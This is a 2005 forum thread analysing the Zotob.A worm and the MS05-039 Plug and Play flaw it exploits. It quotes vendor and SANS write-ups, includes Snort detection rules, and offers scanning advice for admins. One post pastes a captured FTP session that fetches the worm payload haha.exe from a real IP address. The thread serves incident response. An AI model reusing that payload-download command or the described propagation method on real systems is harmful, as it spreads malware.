Articles
|
|
stay
Aug 14 2005, 08:31 PM
Update:see also http://www.microsoft.com/security/encyclop...m:Win32/Zotob.A (infos how the worm works) http://www.microsoft.com/security/incident/zotob.mspxhttp://www.microsoft.com/technet/security/...ory/899588.mspx (updated security advisory) http://www.heise.de/newsticker/meldung/62802 (german) http://www.f-secure.com/v-descs/zotob_a.shtmlQUOTE Summary
Zotob.A is a Mytob clone that spreads using a vulnerability in Windows Plug and Play service (MS05-039).
Detailed Description
The worm is a packed PE executable file 22528 bytes long.
Installation to system
When run, the worm copies under %SYSTEM% directory using the name 'botzor.exe' and creates a named mutex 'B-O-T-Z-O-R'.
It then alters registry entries to ensure that it is started when a user logs on or the system is restarted:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"WINDOWS SYSTEM" = "botzor.exe"
Spreading using Plug and Play service vulnerability
The worm scans for systems vulnerable to Microsoft Windows Plug and Play service (MS05-039) through TCP/445. If the attack is successful a shell (cmd.exe) is started on port 8888. Through the shell port, the worm instructs the remote computer to download and execute the worm from the attacker computer using FTP. The FTP server listens on port 33333 on all infected computers with the purpose of serving out the worm for other hosts that are being infected. The downloaded file is saved as 'haha.exe' on disk.
Bot functionality
The worm tries to connect to IRC channel at predefined address. The attacker who knows channel password can instruct the bot to execute the following actions:
Request worm uptime
Request worm version
Shutdown worm
Download and execute files
Delete files
Update worm
Other details
Zotob.A also contains the following message to AV vendors:
MSG to avs: the first av who detect this worm will be the first
killed in the next 24hours!!! however f-secure and others don't care much about it  QUOTE waiting for the dos to one of them, or maybe just a modded worm killing the specified av? hmm, have a closer look: will be the first, therefore meaning the author wants to attack all avs!? however i think you can see this from two sides, one the hand hand people now hopefully will patch their systems, on the other hand, if your pc is used as drone this also isn't a nice thing and makes clear it's not the authors intention to make you aware of the bad security of your system, like the sasser author intented to do (at least he cleamined so)... what i'm wondering about: shouldn't it be easy to catch the author as he's the only or at least one of less (users could probably get the channel pass through reverse engeneering or by close contact to the author which should also make it possible to catch him) knowing the irc chan pass and joining it?
pita
Aug 14 2005, 08:38 PM
more info from http://isc.sans.org/diary.php?date=2005-08-14CODE
MS05-039 Worm in the wild
-039 is NOT Microsoft's lucky number
One of our readers, John Smith, submitted this:
"Interesting game of numbers:
SQL Slammer was using bug fixed in MS02-039
Zotob is using bug fixed in MS05-039
Hex 39 is 57 decimal, which is big W (Worm? Windows?) in ASCII."
The technical details:
Starting around 11:30 UTC, we've received several reports on a new worm variant that makes use of MS05-039 to spread. If you're not patched yet, this is your last call.
F-Secure named the critter "Zotob.A",http://www.f-secure.com/weblog/
We've also received a submission of a binary called "pnpsrv.exe", which is recognized by ClamAV as Trojan.Spybot-123. Another reader has contributed evidence that a successful exploit by Zotob.A (or variant)
The worm will download the main payload from the infecting machine. Once a machine is infected, it will become an ftp server itself. It will scan for open port 445/tcp. Once it finds a system with port 445 listening, it will try to use the PnP exploit to download and execute the main payload via ftp.
Important facts so far:
- Patch MS05-039 will protect you
- Windows XP SP2 and Windows 2003 can not be exploited by this worm, as the worm does not use a valid logon.
- Blocking port 445 will protect you (but watch for internal infected systems)
- The FTP server does not run on port 21. It appears to pick a random high port.
Quick FTP log:
open aaa.bbb.ccc.ddd 31656
user 1 1
get winpnp.exe
quit
(IP address obfuscated).
We'll keep adding to this diary as new information becomes available.
Thanks so far to Johnathan Norman from Alert Logic for a lot of the details.
Other good information can be found at the F-Sececure weblog athttp://www.f-secure.com/weblog/
Also see the Microsoft MS05-039 bulletin from last week:http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
Please submit any new code captures via our contact page:
http://isc.sans.org/contact.php
If possible, do not pack/encrypt the uploads, maybe provide an md5 sum to preserve the code in its original beauty.
Shown below are Snort rules, submitted by the members of the Alert Logic Security Research Team:
Jeremy Hewlett, Technical Director of Security Research
Johnathan Norman, Sr. Security Analyst
Chris Baker, Technical Director of Security Operations
alert tcp any any -> any 445 (msg:"EXPLOIT SMB-DS Microsoft Windows 2000 Plug and Play Vulnerability"; flow:to_server,established; content:"|FF|SMB%"; depth:5;offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|67157a76|";reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000130; rev:1;)
alert tcp any any -> any 139 (msg:"EXPLOIT NETBIOS SMB Microsoft Windows 2000 PNP Vuln"; flow:to_server,established; content:"|FF|SMB%"; depth:5;offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|3600|"; offset:110; within:5; content:"|F6387A76|";reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000131; rev:1;)
alert tcp any any -> any 445 (msg:"EXPLOIT NETBIOS SMB-DS Microsoft Windows 2000 PNP Vuln"; flow:to_server,established; content:"|FF|SMB%"; depth:5;offset: 4; nocase; content:"|2600|"; depth:2; offset:65; content:"|3600|"; offset:110; within:5; content:"|F6387A76|";reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000132; rev:1;)
ssj4conejo
Aug 14 2005, 10:31 PM
There go the worm writers again ruining everyone's fun. Selfish bastards.
apoc_neo
Aug 15 2005, 08:11 AM
My friend found this, I will not dislose his nick. CODE
open 69.15.252.162 33333
user hell rulez
binary
get haha.exe
quit
Look at what he found here 
Gurou
Aug 15 2005, 12:33 PM
can you please upload the binary ?
Necrocide
Aug 15 2005, 01:23 PM
I knew it would come sooner or later, sad. Crap.
DarkRider
Aug 15 2005, 03:33 PM
They are saying that houseofdabus is spreading the worm 
stay
Aug 15 2005, 07:12 PM
QUOTE(DarkRider @ Aug 15 2005, 02:33 PM) They are saying that houseofdabus is spreading the worm where did you read this? source? i only read that his exploit was used, not that he is the author of the worm (i'd also say that's under his level...)! maybe you understood sth. wrong?
Prophet
Aug 15 2005, 07:48 PM
The creator of this bot is Diablo he isn t going to do anything to the a/v, i know him 
Killaloop
Aug 16 2005, 06:48 AM
QUOTE(Prophet @ Aug 15 2005, 07:48 PM) The creator of this bot is Diablo he isn t going to do anything to the a/v, i know him telling that you know a worm author on a public board is not a very clever thing, especially because microsoft is most likely after him. good luck
aelphaeis_mangarae
Aug 16 2005, 11:50 AM
Diablo is an idiot. 1. He tells people he writes the virus 2. In the 3rd Variant (.c) he tries to add an email spreader, and fails (what a loser.) The worm itself is basically a rip from a new version of Hellbot. 3. The worm itself connects to a turkish IRC channel. Diablo is asking to be busted, I am not sure what Turkey's law's are on this kind of stuff, they seem to get away with a lot...but I don't know about this. Thanks for the info on Diablo Prophet (If your information is correct.) QUOTE They are saying that houseofdabus is spreading the worm A good of example of how the media can screw things up...well not the media but IT Security writers and the like. houseofdabus just wrote a universal exploit for the vulnerbility that is all. The Universal exploit was used in a version of Hellbot, which the guy ripped off and turned into a worm.
Yorn
Aug 16 2005, 04:26 PM
House of dabus's website is down now. I hope it's not because they really suspect him of spreading the worm. He's the same guy that wrote the exploit code for LSASS over a year ago, but everyone knew it was someone else that was actually doing it. I think certain people in the media need to get their facts straight.
I don't know who the guest is that came in to talk about this Diablo individual, but the worm clearly is changing the hosts file which disables the upgradability of most AV software. I would tend to think that poster is fake and doesn't really know the author of the worm.
sp00fy
Aug 17 2005, 07:59 AM
hi!
in my company, we guess that a lot of pc's are indefected with zotob, is there any remote vuln mass scanner out? that will be really usefull for us (my boss is just swearing and stressing all the time) - so can some give me a link to a scanner?
(we won't try to exploit each pc)
cheers
sp00fy
strych_nine
Aug 17 2005, 08:22 AM
QUOTE(sp00fy @ Aug 17 2005, 08:59 AM) hi! in my company, we guess that a lot of pc's are indefected with zotob, is there any remote vuln mass scanner out? that will be really usefull for us (my boss is just swearing and stressing all the time) - so can some give me a link to a scanner? (we won't try to exploit each pc) cheers sp00fy ever heard of av-tools? or netstat, fport, openports? skiddie...
sp00fy
Aug 17 2005, 09:17 AM
@strych_nine: no... you don't get the sense of my question! - Or do you want to make a netstat cmd on a network with over 5000 pc's (without server)? Yes of course we have got mcafee with an agent on each system... but they restart a lot -.- And we have to secure them all... so don0t say me im a kiddie, cause i don't know how to solv this problem -.- -> i need a "mass" scanner like foundstone sasser scanner! ps i guess u don0t realy work in a creat-worldwide company ?
b4nqu0
Aug 17 2005, 01:22 PM
QUOTE(sp00fy @ Aug 17 2005, 02:59 AM) hi! in my company, we guess that a lot of pc's are indefected with zotob, is there any remote vuln mass scanner out? that will be really usefull for us (my boss is just swearing and stressing all the time) - so can some give me a link to a scanner? (we won't try to exploit each pc) cheers sp00fy Nessus has a plugin for this but you need to register to get it. I've heard people say they've used it on there Class B networks so you should be all set. I've also heard eEye has something but it can only do 16 hosts.
strych_nine
Aug 17 2005, 02:00 PM
QUOTE(sp00fy @ Aug 17 2005, 10:17 AM) @strych_nine: no... you don't get the sense of my question! - Or do you want to make a netstat cmd on a network with over 5000 pc's (without server)? Yes of course we have got mcafee with an agent on each system... but they restart a lot -.- And we have to secure them all... so don0t say me im a kiddie, cause i don't know how to solv this problem -.- -> i need a "mass" scanner like foundstone sasser scanner! ps i guess u don0t realy work in a creat-worldwide company ? ok sry, i apologize. i just thought that such a large company has a huge network and an admin who can control things like connections, ports etc. i think massscanning (which most bots do) or outbound connections using an unusual port to on an unusual host would attract attention...
sp00fy
Aug 17 2005, 03:30 PM
@b4nqu0: hi thx for your reply! good idea to remember nessus (why i forgot this one!?) - yes it seems, that u have to register, to get this plugin... oh that seems to take a lot time -.- @strych_nine: did u ever saw a network monitor of a company like this one? - ok we can filter... but thats laboriously, ps of course a few of us started with filtering the internetlinks greez sp00fy
click
Aug 17 2005, 03:45 PM
QUOTE(sp00fy @ Aug 17 2005, 03:30 PM) @b4nqu0: hi thx for your reply! good idea to remember nessus (why i forgot this one!?) - yes it seems, that u have to register, to get this plugin... oh that seems to take a lot time -.- @strych_nine: did u ever saw a network monitor of a company like this one? - ok we can filter... but thats laboriously, ps of course a few of us started with filtering the internetlinks greez sp00fy Or, you could use nmap and scan for port 8888.... From the nessus website: QUOTE A Microsoft Windows shell is running on port 8888. This may indicate an infection by the Zotob worm, although other worms may also create a shell on this port. The remote host has been compromised. Solution : Reinstall the remote host See also : http://securityresponse.symantec.com/avcen...32.zotob.a.htmlRisk factor : High Written by: This script is Copyright © 2005 Tenable Network Security p.s.: you, being a network admin, in a company of 5000 computers, might consider creating an emergency patch roll-out plan.... I work in a company (not as a network admin) of over 100,000 computers across North America -- the issue was resolved within a 1hr timeframe, with less then 100 computers requiring minor attention. Just a comparison...
sp00fy
Aug 17 2005, 07:00 PM
thx for your tipp (shell port 8888)
yes u ve got right... im a network admin in education, so im in the it team, but nothing to say :S ...
i always made suggestion for other solution to our network topologie, technique fw, ids etc... its horrible; eg we wont block connetions to outside, so np for every backdoor, connectback shellcode etc... but as i said... i have nothing to say them... anyway: thx u!
are these pc's and server in one great network woth one high secured gateway to the internet, or are they spreaded? (it seems like spreaded as you said "across North America")
cheers
sp00fy
click
Aug 17 2005, 07:42 PM
Yeah, the computers are setup on numerous different servers and domains, and although all running on the same ISP and domain, connect to different backbones depending on the location.
But, I am glad to have helped a fellow "student" of security.
as0l0
Aug 18 2005, 01:51 AM
QUOTE(click @ Aug 17 2005, 11:45 PM) p.s.: you, being a network admin, in a company of 5000 computers, might consider creating an emergency patch roll-out plan.... I work in a company (not as a network admin) of over 100,000 computers across North America -- the issue was resolved within a 1hr timeframe, with less then 100 computers requiring minor attention. Just a comparison... Can you tell us how you patched 100,000 machines within 1 hour? Can you also tell us how you confirmed that patching?
sp00fy
Aug 18 2005, 05:36 AM
QUOTE Can you tell us how you patched 100,000 machines within 1 hour? Can you also tell us how you confirmed that patching? --> u just need to close the ports... so u can patching - saved from zotob...
as0l0
Aug 18 2005, 06:46 AM
QUOTE(sp00fy @ Aug 18 2005, 01:36 PM) QUOTE Can you tell us how you patched 100,000 machines within 1 hour? Can you also tell us how you confirmed that patching? --> u just need to close the ports... so u can patching - saved from zotob... You close the ports on 100,000 machines? Or just at the permiter?
tuttefrut
Aug 18 2005, 08:41 AM
QUOTE You close the ports on 100,000 machines? Or just at the permiter?
if you do it at the permitter it can still spread itself in the netwerk, no ?
sp00fy
Aug 18 2005, 10:12 AM
May depend on the programmers code... it will connect to an turkish ircd... and that will fail... so what then happens is unknow to me... any its better to close th permitter (one these ports) and than kill them in the intranet, without any new incoming zotob's...
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
|
